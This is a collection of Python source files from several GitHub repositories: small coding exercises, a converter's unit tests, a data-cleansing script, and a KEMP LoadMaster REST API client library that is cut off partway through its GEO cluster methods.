alive_nodes = stop_master_primary(txnPoolNodeSet, initial_view_no + 1)\n start_view_change(alive_nodes, initial_view_no + 1)\n\n ensureElectionsDone(looper=looper, nodes=alive_nodes, instances_list=range(3))\n\n # There were 2 view changes\n for node in alive_nodes:\n assert (node.viewNo - initial_view_no) == 2\n\n # The timeout method was called 1 time\n check_watchdog_called_expected_times(txnPoolNodeSet, timeout_callback_stats, 1)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/view_change/test_view_change_timeout.py","file_name":"test_view_change_timeout.py","file_ext":"py","file_size_in_byte":6671,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"17756951532","text":"# inplace\n\ndef reverseWords( s: str) -> str:\n s = s.strip()\n if s == '':\n return ''\n\n ns = ''\n\n left, right = len(s) - 1, len(s)\n while left != 0:\n\n if s[left] != ' ':\n left -= 1\n else:\n ns += s[left + 1:right].strip() + ' '\n\n 
while s[left] == ' ':\n left -= 1\n\n right = left + 1\n\n ns += s[left:right].strip()\n\n return ns\n\n\nprint(reverseWords( 'the sky is blue'))","repo_name":"zhoux811/codepath","sub_path":"week7/sat/p3.151. Reverse Words in a String.py","file_name":"p3.151. Reverse Words in a String.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29961930757","text":"\ndef collect(s, n, final=[]):\n if s in str_vector:\n final = []\n if len(s) >= n:\n final.append(s[:n])\n a=s[n:]\n return collect(a,n,final)\n else:\n return sorted(final)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"TcKZnbdgx7q6LLoFR_21.py","file_name":"TcKZnbdgx7q6LLoFR_21.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72424767450","text":"age = int(input())\nname = input()\nif age > 0 and age < 75:\n if name == \"Иван\":\n print(\"Ивану вход воспрещён!!!\")\n else:\n if age > 16:\n print(\"Поздровляем, Вы поступили во ВГУИТ!\")\n else:\n print(\"Сначала нужно окончить школу!\")\nelse:\n print(\"Нужно ввести корректный возраст!\")","repo_name":"maxSHabanov33312/VSUET","sub_path":"VSUET/Sem1/OP/1pr/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13156381718","text":"import uzbek_latin_cyrillic_converter.converter as converter\n\n\ndef test_get_cyrillic_or_same_char():\n param0 = ('s', True)\n expected0 = (1, 'с')\n assert expected0 == converter.get_cyrillic_or_same_char(*param0)\n\n param1 = ('S', True)\n expected1 = (1, 'С')\n assert expected1 == converter.get_cyrillic_or_same_char(*param1)\n\n param2 = ('e', True)\n expected2 = (1, 'э')\n assert expected2 == converter.get_cyrillic_or_same_char(*param2)\n\n param3 = ('E', True)\n expected3 = (1, 'Э')\n assert expected3 == converter.get_cyrillic_or_same_char(*param3)\n\n param4 = ('e', False)\n expected4 = (1, 'е')\n assert expected4 == converter.get_cyrillic_or_same_char(*param4)\n\n param5 = ('E', False)\n expected5 = (1, 'Е')\n assert expected5 == converter.get_cyrillic_or_same_char(*param5)\n\n\ndef test_get_space_or_value_from_two_letters_down():\n param0 = ('s', 'h', True)\n expected0 = (2, 'ш')\n assert expected0 == converter.get_space_or_value_from_two_letters_down(*param0)\n\n param1 = ('S', 'h', True)\n expected1 = (2, 'Ш')\n assert expected1 == converter.get_space_or_value_from_two_letters_down(*param1)\n\n param2 = ('o', '\\'', True)\n expected2 = (2, 'ў')\n assert expected2 == converter.get_space_or_value_from_two_letters_down(*param2)\n\n param3 = ('O', '\\'', True)\n expected3 = (2, 'Ў')\n assert expected3 == converter.get_space_or_value_from_two_letters_down(*param3)\n\n param4 = ('o', '‘', True)\n expected4 = (2, 'ў')\n assert expected4 == converter.get_space_or_value_from_two_letters_down(*param4)\n\n param5 = ('O', '‘', True)\n expected5 = (2, 'Ў')\n assert expected5 == converter.get_space_or_value_from_two_letters_down(*param5)\n\n param6 = ('g', '\\'', True)\n expected6 = (2, 'ғ')\n assert expected6 == converter.get_space_or_value_from_two_letters_down(*param6)\n\n param7 = ('G', '\\'', True)\n expected7 = (2, 'Ғ')\n assert expected7 == converter.get_space_or_value_from_two_letters_down(*param7)\n\n param8 = ('s', 'n', True)\n expected8 = (1, 'с')\n assert expected8 == 
converter.get_space_or_value_from_two_letters_down(*param8)\n\n\ndef test_get_space_or_value_from_three_letters_down():\n param0 = ('y', 'o', '\\'', True)\n expected0 = (3, 'йў')\n assert expected0 == converter.get_space_or_value_from_three_letters_down(*param0)\n\n param1 = ('Y', 'o', '\\'', True)\n expected1 = (3, 'Йў')\n assert expected1 == converter.get_space_or_value_from_three_letters_down(*param1)\n\n param2 = ('y', 'o', '‘', True)\n expected2 = (3, 'йў')\n assert expected2 == converter.get_space_or_value_from_three_letters_down(*param2)\n\n param3 = ('s', 'h', 'j', True)\n expected3 = (2, 'ш')\n assert expected3 == converter.get_space_or_value_from_three_letters_down(*param3)\n\n param4 = ('o', 'b', 'd', True)\n expected4 = (1, 'о')\n assert expected4 == converter.get_space_or_value_from_three_letters_down(*param4)\n\n\ndef test_latin_to_cyrillic():\n assert 'салом' == converter.latin_to_cyrillic('salom')\n assert 'Йўқ' == converter.latin_to_cyrillic(\"Yo'q\")\n","repo_name":"Rhtyme/uzbek_latin_cyrillic_converter","sub_path":"tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30300440361","text":"import os.path\nimport os\nimport errno\nimport json\nimport datetime\n\n\nclass Cleanse(object):\n def __init__(self):\n return\n\n def cleanse_drinks(self, file_location):\n data = []\n date = {}\n name = {}\n location = {}\n price = {}\n with open(os.path.dirname(__file__) + file_location) as fp:\n for (i, line) in enumerate(fp):\n line = json.loads(line)\n line = line['drink']\n del line['__key__']\n del line['description']\n\n data.append(line)\n self.add_to_map(self.clean_name(line['name']), name)\n self.add_to_map(self.clean_date(line['date']), date)\n self.add_to_map(self.clean_location(line['location']), location)\n self.add_to_map(line['price'], price)\n # data = json.load(fp)\n # for drink in data:\n # self.add_to_map(data.name)\n\n with open(os.path.dirname(__file__) + '/../raw_data/parsed2019-12-03T22_23_031', 'w') as fp:\n json.dump(data, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/name.json', 'w') as fp:\n json.dump(name, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/date.json', 'w') as fp:\n json.dump(date, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/loc.json', 'w') as fp:\n json.dump(location, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/price.json', 'w') as fp:\n json.dump(price, fp, sort_keys=True, indent=4)\n\n def clean_name(self, name):\n return name.strip().lower()\n\n def clean_date(self, date):\n return date[0:13]\n\n def clean_location(self, location):\n return location.strip().lower()\n\n def add_to_map(self, val, map_name):\n if val in map_name:\n map_name[val] += 1\n else:\n map_name[val] = 1\n\nif __name__ == \"__main__\":\n cleanse = Cleanse()\n cleanse.cleanse_drinks('/../raw_data/parsed2019-12-03T22_23_031')\n","repo_name":"ryqndev/stats-boba-watch","sub_path":"scripts/cleanse.py","file_name":"cleanse.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26948902203","text":"import rtmaps.types\nimport numpy as np\nimport rtmaps.core as rt\nimport rtmaps.reading_policy\nfrom rtmaps.base_component import BaseComponent\nimport pyproj # in pyproj library there is a 
methdod called Geod\nimport csv\n\nlog = False\n\nclass rtmaps_python(BaseComponent):\n # constructeur de la classe\n def __init__(self):\n BaseComponent.__init__(self)\n\n # configuration des I/O\n def Dynamic(self):\n self.add_output(\"points_traj\", rtmaps.types.FLOAT64);\n self.add_property(\"path\", \"C:/Users/bolo.LAPTOP-0A1UK5DI/Documents/ESIG/S8/repo git/records/record1/trajectoryCise.csv\", rtmaps.types.FILE)\n self.add_property(\"recording\", False)\n\n # appel a la creation\n def Birth(self):\n print(\"starting...\");\n\n # called every input\n def Core(self):\n\n with open(self.properties[\"path\"].data) as csvDataFile: # open the cvs file\n data = [row for row in csv.reader(csvDataFile, delimiter=' ')] # put it into and array [row][column]\n x = len(data)\n\n for j in range(len(data)):\n out = data[j]\n print(out)\n self.outputs[\"points_traj\"].write([float(out[0]), float(out[1])])\n\n exit(0)\n\n\n\n # destroy\n def Death(self):\n print(\" Why did you kill me !?? :'(\");\n pass","repo_name":"Bol0/ESIGELEC_UTAC_1","sub_path":"modules_python/importUTMTraj.py","file_name":"importUTMTraj.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70881437210","text":"import logging\nimport os\nimport time\nimport subprocess\n\nfrom requests import exceptions\n\nfrom python_kemptech_api import utils\nfrom python_kemptech_api.api_xml import (\n get_data_field,\n is_successful,\n get_data,\n get_error_msg\n)\nfrom python_kemptech_api.capabilities import CAPABILITIES, DEFAULT\nfrom python_kemptech_api.exceptions import (\n LoadMasterParameterError,\n KempTechApiException,\n BackupFailed,\n CommandNotAvailableException,\n UserAlreadyExistsException,\n DownloadUserCertFailed,\n NotVirtualServiceInstanceError\n)\nfrom python_kemptech_api.generic import HttpClient, AccessInfoMixin\nfrom python_kemptech_api.objects import (\n VirtualService,\n CipherSet,\n Certificate,\n Sso,\n Rule,\n GlobalACL,\n Template,\n Fqdn,\n Cluster,\n Range,\n CustomLocation,\n Interface,\n IntermediateCertificate)\nfrom python_kemptech_api.utils import (\n send_response,\n validate_port,\n validate_ip,\n validate_protocol,\n get_api_bool_string,\n cast_to_list,\n get_dict_entry_as_list,\n get_sub_vs_list_from_data,\n build_object,\n list_object\n)\n\nlog = logging.getLogger(__name__)\n\n\nclass BaseKempAppliance(HttpClient, AccessInfoMixin):\n def __init__(self, ip, username=None, password=None, port=443, cert=None):\n self.ip_address = ip\n self.username = username\n self.password = password\n self.port = port\n self.cert = cert\n self.access_point = \"access\"\n self.version = None\n\n super(BaseKempAppliance, self).__init__(utils.DEFAULT_TLS_VERSION,\n self.cert)\n\n def __repr__(self):\n return '{}:{}'.format(self.ip_address, self.port)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.version == other.version\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, self.__class__):\n return self.version > other.version\n else:\n return False\n\n def __lt__(self, other):\n if isinstance(other, self.__class__):\n return self.version < other.version\n else:\n return False\n\n def __ge__(self, other):\n if isinstance(other, self.__class__):\n return self.version >= other.version\n else:\n return False\n\n def __le__(self, other):\n if isinstance(other, self.__class__):\n return self.version <= 
other.version\n else:\n return False\n\n def _do_request_no_api(self, cmd):\n \"\"\"Perform a get in the context of enabling the API.\"\"\"\n url = \"https://{}:{}/{}\".format(self.ip_address, self.port, cmd)\n if self.cert:\n resp = self._tls_session.get(url, verify=False, timeout=1, cert=self.cert)\n else:\n resp = self._tls_session.get(url, verify=False, timeout=1,\n auth=(self.username, self.password))\n self._tls_session.close()\n return resp.status_code\n\n @property\n def endpoint(self):\n if self.cert:\n return \"https://{ip}:{port}/{access}\".format(\n ip=self.ip_address,\n port=self.port,\n access=self.access_point\n )\n else:\n return \"https://{user}:{pw}@{ip}:{port}/{access}\".format(\n user=self.username,\n pw=self.password,\n ip=self.ip_address,\n port=self.port,\n access=self.access_point\n )\n\n @property\n def capabilities(self):\n if self.version is None:\n self.version = \"7.1.34\"\n return CAPABILITIES.get(self.version, CAPABILITIES[DEFAULT])\n\n def _get_curl_command_list(self, command):\n \"\"\"\n Return a properly formatted curl command equivalent of the API call\n :param command:\n :return:\n \"\"\"\n curl = ['curl', '-s', '-k', '--connect-timeout', str(utils.TIMEOUT)]\n command = '{}/{}'.format(self.endpoint, command)\n if self.cert:\n curl.extend(['-E', self.cert])\n curl.append(command)\n return curl\n\n @property\n def license(self):\n \"\"\"Current license on the LoadMaster\n\n :return: License information\n \"\"\"\n response = self._get(\"/licenseinfo\")\n\n if is_successful(response):\n data = get_data(response)\n license_info = {}\n\n # Fix annoying API weirdness\n for k, v in data.items():\n k = k.lower()\n\n try:\n if v[0] == '\"':\n v = v[1:]\n\n if v[-1] == '\"':\n v = v[:-1]\n\n if v[-1] == \"\\n\":\n v = v[:-1]\n except (IndexError, KeyError):\n # Catch scenarios where there is no data\n pass\n\n if isinstance(v, str):\n v = v.replace(\" \", \" \")\n\n license_info[k] = v\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return license_info\n\n @property\n def interfaces(self):\n \"\"\" Dictionary of named interfaces\n\n :return: Dict with interface name and Interface instance key / value pairs.\n \"\"\"\n return {interface.interface: interface\n for interface in self.get_interfaces()}\n\n def __getitem__(self, parameter):\n return self.get_parameter(parameter)\n\n def __setitem__(self, parameter, value):\n self.set_parameter(parameter, value)\n\n def set_parameter(self, parameter, value):\n \"\"\"Assign the value to the given loadmaster parameter\n\n :param parameter: A valid LoadMaster parameter.\n :type parameter: str.\n :param value: The value to be assigned\n :type value: str.\n :raises: LoadMasterParameterError\n \"\"\"\n parameters = {\n 'param': parameter,\n 'value': value,\n }\n\n response = self._get('/set', parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n @property\n def acl(self):\n return self.get_global_acl()\n\n def get_global_acl(self):\n return GlobalACL(self.access_info)\n\n def get_parameter(self, parameter):\n \"\"\"Get the value of the given LoadMaster parameter\n\n :param parameter: A valid LoadMaster parameter.\n :type parameter: str.\n :return: str -- The parameter value\n \"\"\"\n parameters = {\n 'param': parameter,\n }\n response = self._get('/get', parameters)\n value = get_data_field(response, parameter)\n\n if isinstance(value, dict):\n # This hack converts possible HTML to an awful one string\n # disaster instead of returning parsed html as an 
OrderedDict.\n value = \"\".join(\"{!s}={!r}\".format(key, val) for (key, val) in\n sorted(value.items()))\n\n if parameter == \"version\":\n self.version = \".\".join(value.split(\".\")[:3])\n\n return value\n\n def get_all_parameters(self):\n \"\"\" Return all parameters as a dict with lowercase keys\n :return: A dict of all the parameters, with the keys in lowercase\n \"\"\"\n response = self._get(\"/getall\")\n data = get_data(response)\n return dict((k.lower(), v) for k, v in data.items())\n\n def enable_api(self, health_check_api=False):\n \"\"\" Enable LoadMaster RESTfull API\n\n This method will attempt to enable the LoadMaster's REST API the 'right' way\n by initially trying to set it with enableapi parameter. If this fails it will\n attempt to set it the old way using the progs URL.\n\n :param health_check_api: If True, an extra call to the API will be made\n to verify operability, only works for machines older\n than 7.2.36.\n :return: True if successfully enabled.\n \"\"\"\n # Can't use the HttpClient methods for this as the endpoint is different\n # (or has strict stipulations) when attempting to enable the API.\n try:\n status_code = self._do_request_no_api('access/set?param=enableapi&value=yes')\n if status_code == 404:\n self._do_request_no_api('progs/doconfig/enableapi/set/yes')\n status_code = self._do_request_no_api('progs/status/logout')\n if status_code != 200:\n raise KempTechApiException(code=status_code)\n if health_check_api:\n # Health check to see if API was actually enabled\n # if it failed its usually due to auth error so raise a 401\n status_code = self._do_request_no_api('access/get?param=version')\n if status_code != 200:\n raise KempTechApiException(code=401)\n elif status_code != 200:\n raise KempTechApiException(code=status_code)\n return True\n except exceptions.RequestException as e:\n raise KempTechApiException(msg=\"Enable API failed because of: {}\".format(\n e.__class__.__name__), is_xml_msg=False)\n\n def stats(self):\n response = self._get('/stats')\n return send_response(response)\n\n def update_firmware(self, file):\n response = self._post('/installpatch', file)\n self.version = None\n return is_successful(response)\n\n def restore_firmware(self):\n response = self._get(\"/restorepatch\")\n self.version = None\n return is_successful(response)\n\n def reset_logs(self):\n response = self._get(\"/logging/resetlogs\")\n return is_successful(response)\n\n def download_logs(self, filename=None):\n response = self._get(\"/logging/downloadlogs\")\n\n filename = filename or \"LoadMaster_\" + self.ip_address + \"_Logs.tgz\"\n\n with open(filename, 'w') as f:\n f.write(response)\n\n return filename\n\n def change_bal_password(self, new_password):\n parameters = {\n \"currpassword\": self.password,\n \"password\": new_password\n }\n\n response = self._get(\"/usersetsyspassword\", parameters=parameters)\n\n if is_successful(response):\n self.password = new_password\n return True\n else:\n return False\n\n def add_local_user(self, user, password=None, radius=False):\n params = {\n 'user': user,\n 'radius': get_api_bool_string(radius),\n }\n if password is None:\n params['nopass'] = 'y'\n else:\n params['password'] = password\n\n try:\n response = self._get('/useraddlocal', params)\n except KempTechApiException as e:\n if str(e) == \"User already exists.\":\n raise UserAlreadyExistsException(user, self.ip_address)\n else:\n raise\n return send_response(response)\n\n def delete_local_user(self, user):\n params = {'user': user}\n response = 
self._get('/userdellocal', params)\n return send_response(response)\n\n def set_user_perms(self, user, perms=None):\n perms = [] if perms is None else perms\n perms = cast_to_list(perms)\n params = {\n 'user': user,\n 'perms': \",\".join([perm for perm in perms]),\n }\n response = self._get('/usersetperms', params)\n return send_response(response)\n\n def new_user_cert(self, user):\n params = {'user': user}\n response = self._get('/usernewcert', params)\n return send_response(response)\n\n def download_user_cert(self, user, location=os.curdir):\n file_name = os.path.join(location, \"{}.cert\".format(user))\n\n with open(file_name, 'wb') as file:\n cmd = self._get_curl_command_list('userdownloadcert?user={}'\n .format(user))\n subprocess.call(cmd, stdout=file)\n file.seek(0, 2)\n if file.tell() == 0:\n raise DownloadUserCertFailed(self.ip_address)\n return file_name\n\n def shutdown(self):\n response = self._get('/shutdown')\n return is_successful(response)\n\n def reboot(self):\n response = self._get('/reboot')\n return is_successful(response)\n\n def get_license_info(self):\n try:\n response = self._get('360/licenseinfo')\n return send_response(response)\n\n except KempTechApiException:\n raise CommandNotAvailableException(\n self, '/access360/licenseinfo')\n\n def list_addons(self):\n response = self._get('/listaddon')\n return send_response(response)\n\n def get_diagnostic(self, diagnostic):\n response = self._get('/logging/{}'.format(diagnostic))\n return response\n\n def backup(self, location='backups'):\n if not os.path.exists(location):\n os.makedirs(location)\n file_name = os.path.join(location, \"{}_{}.backup\".format(\n self.ip_address, time.strftime(\"%Y-%m-%d_%H:%M:%S\")))\n\n with open(file_name, 'wb') as file:\n cmd = self._get_curl_command_list('backup')\n subprocess.call(cmd, stdout=file)\n file.seek(0, 2)\n if file.tell() == 0:\n raise BackupFailed(self.ip_address)\n return file_name\n\n def restore_backup(self, backup_type, file):\n # 1 LoadMaster Base Configuration\n # 2 Virtual Service Configuration\n # 3 GEO Configuration\n if backup_type not in [1, 2, 3]:\n backup_type = 2\n params = {\"type\": backup_type}\n response = self._post('/restore', file=file,\n parameters=params)\n return send_response(response)\n\n def alsi_license(self, kemp_id, password):\n params = {\n \"kempid\": kemp_id,\n \"password\": password,\n }\n response = self._get('/alsilicense', parameters=params)\n return send_response(response)\n\n def offline_license(self, license_file):\n response = self._post(\"/license\", file=license_file)\n return send_response(response)\n\n def set_initial_password(self, password):\n params = {\"passwd\": password}\n response = self._get('/set_initial_passwd', parameters=params)\n return send_response(response)\n\n def kill_asl_instance(self):\n response = self._get('/killaslinstance')\n return send_response(response)\n\n def get_interfaces(self):\n interfaces = []\n try:\n response = self._get('/showiface')\n data = get_data(response)\n interfaces_data = data.get('Interface', [])\n interfaces_data = cast_to_list(interfaces_data)\n for iface_data in interfaces_data:\n iface = build_object(Interface, self.access_info, iface_data)\n # Check for duplicate IPs as there is a bug in LoadMaster showiface\n # that makes unset interfaces inherit the previous interfaces IP.\n for interface in interfaces:\n if iface.addr == interface.addr:\n break\n else:\n interfaces.append(iface)\n return interfaces\n except KempTechApiException as e:\n # If showiface does not support 
listing of all interfaces (possibly due to\n # older version loadmasters) do it the hard way by doing it one by one getting\n # the IDs from /access/stats.\n # This will cause N+1 API calls to occur, N being the number of interfaces.\n if hasattr(e, \"status_code\") and e.status_code == 422:\n try:\n response = self._get('/stats')\n data = get_data(response)\n xml_object = data.get('Network', {})\n except KempTechApiException:\n xml_object = {}\n\n for k, v in xml_object.items():\n obj = self.get_interface(v['ifaceID'])\n obj.name = k\n interfaces.append(obj)\n return interfaces\n else:\n raise\n\n def get_interface(self, interface):\n response = self._get(\"/showiface\", {\"interface\": interface})\n xml_object = get_data(response)\n obj = build_object(Interface, self.access_info, xml_object)\n return obj\n\n def initial_license(self,\n license_type=None,\n callhome=None,\n new_password=None,\n kempid=None):\n\n self.get_eula()\n self.accept_eula(license_type)\n self.set_callhome(callhome)\n\n if kempid is not None:\n self.alsi_license(kempid['username'], kempid['password'])\n self.initial_password(new_password)\n else:\n raise KempTechApiException(\"Please license before proceeding.\")\n\n def get_eula(self):\n api = \"/readeula\"\n\n response = self._get(api)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n self.magic = data['Magic']\n return data['Eula']\n\n def accept_eula(self, license_type=\"trial\"):\n api = \"/accepteula\"\n\n parameters = {\n \"type\": license_type,\n \"magic\": self.magic\n }\n\n response = self._get(api, parameters=parameters)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n self.magic = data['Magic']\n\n def set_callhome(self, enabled=True):\n api = \"/accepteula2\"\n\n if enabled is True:\n enabled = \"yes\"\n else:\n enabled = \"no\"\n\n parameters = {\n \"accept\": enabled,\n \"magic\": self.magic\n }\n\n response = self._get(api, parameters=parameters)\n\n if not is_successful(response):\n raise KempTechApiException(get_error_msg(response))\n\n def initial_password(self, password=\"2fourall\"):\n api = \"/set_initial_passwd\"\n\n parameters = {\n \"passwd\": password\n }\n\n response = self._get(api, parameters=parameters)\n\n if not is_successful(response):\n raise KempTechApiException(get_error_msg(response))\n\n self.password = password\n\n def ping(self, host, interface=None):\n parameters = {\n \"addr\": host\n }\n\n if interface is not None:\n parameters['intf'] = interface\n\n try:\n response = self._get(\"/logging/ping\", parameters=parameters)\n except KempTechApiException:\n return False\n else:\n if \"connect: Network is unreachable\" in response:\n return False\n return True\n\n def refresh_dns(self):\n api = \"/resolvenow\"\n response = self._get(api)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n\nclass Geo(BaseKempAppliance):\n \"\"\"GEO API object.\"\"\"\n _GEO_PARAMS = [\n \"sourceofauthority\",\n \"namesrv\",\n \"soaemail\",\n \"ttl\",\n \"persist\",\n \"checkinterval\",\n \"conntimeout\",\n \"retryattempts\"\n ]\n\n def __getitem__(self, parameter):\n if parameter.lower() in Geo._GEO_PARAMS:\n return self.get_geo_parameter(parameter)\n else:\n return self.get_parameter(parameter)\n\n def __setitem__(self, parameter, value):\n if parameter.lower() in Geo._GEO_PARAMS:\n self.set_geo_parameter(parameter, value)\n else:\n 
self.set_parameter(parameter, value)\n\n def set_geo_parameter(self, parameter, value):\n \"\"\"assign the value to the given loadmaster parameter\n\n :param parameter: a valid LoadMaster parameter.\n :type parameter: str.\n :param value: the value to be assigned\n :type value: str.\n :raises: LoadMasterParameterError\n \"\"\"\n parameters = {\n parameter: value\n }\n response = self._get('/modparams', parameters)\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def get_geo_parameter(self, parameter):\n \"\"\"get the value of the given GEO parameter\n\n :param parameter: a valid GEO parameter.\n :type parameter: str.\n :return: str -- the parameter value\n \"\"\"\n\n def _find_key_recursive(d, key):\n match = [k for k, v in d.items() if k.lower() == key.lower()]\n if match:\n return d[match.pop()]\n for v in d.values():\n if isinstance(v, dict):\n item = _find_key_recursive(v, key)\n if item is not None:\n return item\n\n response = self._get('/listparams')\n data = get_data(response)\n value = _find_key_recursive(data, parameter)\n return value\n\n def enable_geo(self):\n response = self._get('/enablegeo')\n return is_successful(response)\n\n def disable_geo(self):\n response = self._get('/disablegeo')\n return is_successful(response)\n\n @property\n def fqdns(self):\n return {fqdn.fqdn: fqdn for fqdn in self.get_fqdns()}\n\n @property\n def clusters(self):\n return {cluster.ip: cluster for cluster in self.get_clusters()}\n\n @property\n def ipranges(self):\n return {iprange.ip: iprange for iprange in self.get_ranges()}\n\n @property\n def customlocations(self):\n return {customlocation.name: customlocation\n for customlocation in self.get_customlocations()}\n\n def get_acl_settings(self):\n response = self._get(\"/geoacl/getsettings\")\n\n if is_successful(response):\n data = get_data(response)\n data = data['GeoAcl']\n else:\n raise KempTechApiException(get_error_msg(response))\n\n acl_settings = {}\n\n for k, v in data.items():\n if v == \"yes\":\n v = True\n elif v == \"no\":\n v = False\n elif v == \"Never\":\n v = None\n else:\n try:\n v = int(v) # pylint: disable=redefined-variable-type\n except ValueError:\n pass\n\n acl_settings[k.lower()] = v\n\n return acl_settings\n\n def set_acl_settings(self,\n autoupdate=None,\n autoinstall=None,\n installtime=None):\n if autoupdate is not None:\n command = \"setautoupdate\"\n key = \"enable\"\n value = autoupdate\n\n elif autoinstall is not None:\n command = \"setautoinstall\"\n key = \"enable\"\n value = autoinstall\n\n elif installtime is not None:\n command = \"setinstalltime\"\n key = \"hour\"\n value = autoinstall\n\n if value in [True, \"yes\", \"y\", \"1\"]:\n value = \"yes\"\n\n if value in [False, \"no\", \"n\", \"0\"]:\n value = \"no\"\n\n parameters = {\n key: value\n }\n\n response = self._get(\"/geoacl/{}\".format(command), parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n @property\n def acl_autoupdate(self):\n return self.get_acl_settings()['autoupdate']\n\n @acl_autoupdate.setter\n def acl_autoupdate(self, value):\n self.set_acl_settings(autoupdate=value)\n\n @property\n def acl_autoinstall(self):\n return self.get_acl_settings()['autoinstall']\n\n @acl_autoinstall.setter\n def acl_autoinstall(self, value):\n self.set_acl_settings(autoinstall=value)\n\n @property\n def acl_installtime(self):\n return self.get_acl_settings()['installtime']\n\n @acl_installtime.setter\n def acl_installtime(self, value):\n 
self.set_acl_settings(installtime=value)\n\n @property\n def acl_lastupdated(self):\n return self.get_acl_settings()['lastupdated']\n\n @property\n def acl_lastinstalled(self):\n return self.get_acl_settings()['lastinstalled']\n\n def acl_update(self):\n response = self._get(\"/geoacl/updatenow\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def acl_install(self):\n response = self._get(\"/geoacl/installnow\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n @property\n def acl_download(self):\n response = self._get(\"/geoacl/downloadlist\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return response\n\n @property\n def acl_changes(self):\n response = self._get(\"/geoacl/downloadchanges\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return response\n\n def get_acl(self, type):\n parameters = {\n \"type\": type\n }\n response = self._get(\"/geoacl/listcustom\", parameters)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n list_tag = \"{}list\".format(type).capitalize()\n\n acl_list = data[list_tag]\n\n if acl_list is None:\n acl_list = []\n elif isinstance(acl_list, dict):\n acl_list = acl_list.get('addr')\n\n if not isinstance(acl_list, list):\n acl_list = [acl_list]\n\n return acl_list\n\n def add_acl(self, type, value):\n parameters = {\n \"type\": type,\n \"addr\": value\n }\n\n response = self._get(\"/geoacl/addcustom\", parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def remove_acl(self, type, value):\n parameters = {\n \"type\": type,\n \"addr\": value\n }\n\n response = self._get(\"/geoacl/removecustom\", parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def set_acl(self, type, value):\n if not isinstance(value, list):\n raise ValueError(\"Setting ACL expects a list of IP networks\")\n\n current = self.get_acl(type)\n\n to_delete = list(set(current) - set(value))\n to_add = list(set(value) - set(current))\n\n for address in to_delete:\n self.remove_acl(type, address)\n\n for address in to_add:\n self.add_acl(type, address)\n\n @property\n def acl_whitelist(self):\n return self.get_acl(\"white\")\n\n @acl_whitelist.setter\n def acl_whitelist(self, value):\n self.set_acl(\"white\", value)\n\n @property\n def acl_blacklist(self):\n return self.get_acl(\"black\")\n\n @acl_blacklist.setter\n def acl_blacklist(self, value):\n self.set_acl(\"black\", value)\n\n def create_fqdn(self, fqdn):\n return Fqdn(self.access_info, fqdn)\n\n def get_fqdns(self):\n try:\n response = self._get(\"/listfqdns\")\n data = get_data(response)\n return list_object(Fqdn, self.access_info, data)\n except KempTechApiException:\n # If API returns 'No geo data found' return an empty list\n return []\n\n def get_fqdn(self, fqdn):\n service_id = {\n \"fqdn\": fqdn\n }\n\n # Append a . 
to the fqdn if it does not\n # exist as it is required for FQDN syntax\n if service_id['fqdn'][-1] != \".\":\n service_id['fqdn'] += \".\"\n\n response = self._get(\"/showfqdn\", service_id)\n data = get_data(response)\n fqdn = build_object(Fqdn, self.access_info, data)\n return fqdn\n\n def create_cluster(self, ip, name):\n \"\"\"Cluster factory with pre-configured LoadMaster connection.\"\"\"\n return Cluster(self.access_info, ip, name)\n\n def get_clusters(self):\n try:\n response = self._get(\"/listclusters\")\n data = get_data(response)\n clusters = data.get('cluster', [])\n except KempTechApiException:\n clusters = []\n\n cluster_list = []\n clusters = cast_to_list(clusters)\n for c in clusters:\n cluster = self.build_cluster(c)\n cluster_list.append(cluster)\n return cluster_list\n\n def get_cluster(self, ip):\n service_id = {\"ip\": ip}\n response = self._get(\"/showcluster\", service_id)\n data = get_data(response)\n cluster_data = data.get('cluster')\n # again line below will fail with ValidationError if empty response\n if not isinstance(cluster_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of clusters returned\",\n cluster_data)\n cluster 